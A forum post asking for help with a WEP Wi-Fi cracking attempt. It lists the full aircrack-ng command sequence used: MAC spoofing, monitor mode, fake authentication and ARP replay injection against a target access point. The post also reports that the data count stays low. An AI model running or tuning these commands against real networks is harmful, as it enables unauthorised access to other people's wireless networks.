I am currently trying to crack a wep connection with arp injection. I managed to get an arp message.
Here are the commands I typed, in order:
- ifconfig (to learn that my interface is called wlan0)
- macchanger --mac 00:11:22:33:44:55 wlan0
- airodump-ng wlan0 to learn that my targeted network has willy as essid, is on channel 11 and has for bssid aa:bb:cc:dd:ee:ff (it's not the true address but I modified it to simplify the reading of this post)
- airmon-ng start wlan0 11
- aireplay-ng -9 -e Willy -a aa:bb:cc:dd:ee:ff mon0
I received "injection is working" and a 30/30 100%
- airodump-ng -c 11 --bssid aa:bb:cc:dd:ee:ff -w output mon0
Then in a second shell:
- aireplay-ng -1 6000 -o 1 -q 10 -e Willy -a aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 mon0
After a few lines I received "association successfull" and then regularly:
Sending keep Alive packet [ACK]
I then open one last shell and type:
- aireplay-ng -3 -b aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 mon0
And I wait until I receive an arp packet.
The problem is that, after I receive one, the sending packets are increasing in the third and last shell, and I still receive acknowlegdment packets in the second shell, but the #data column in the first shell still isn't increasing by much (around +1/minute only)
How can that be ?
Don't hesitate to ask any further questions or ask me to do any tests (tcpdump...) that you feel relevant.